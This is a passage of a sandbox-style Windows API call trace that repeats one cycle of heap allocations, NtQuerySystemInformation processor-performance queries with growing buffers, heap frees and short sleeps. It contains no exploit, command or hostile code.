ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.957] Sleep (dwMilliseconds=0x110) [0222.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.975] Sleep (dwMilliseconds=0x110) [0222.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.995] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.996] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.997] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.997] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.998] Sleep (dwMilliseconds=0x110) [0223.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.068] Sleep (dwMilliseconds=0x110) [0223.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.079] Sleep (dwMilliseconds=0x110) [0223.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.099] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.101] Sleep (dwMilliseconds=0x110) [0223.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.113] Sleep (dwMilliseconds=0x110) [0223.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.128] Sleep (dwMilliseconds=0x110) [0223.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.142] Sleep (dwMilliseconds=0x110) [0223.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.160] Sleep (dwMilliseconds=0x110) [0223.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.188] Sleep (dwMilliseconds=0x110) [0223.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.206] Sleep (dwMilliseconds=0x110) [0223.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.223] Sleep (dwMilliseconds=0x110) [0223.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.239] Sleep (dwMilliseconds=0x110) 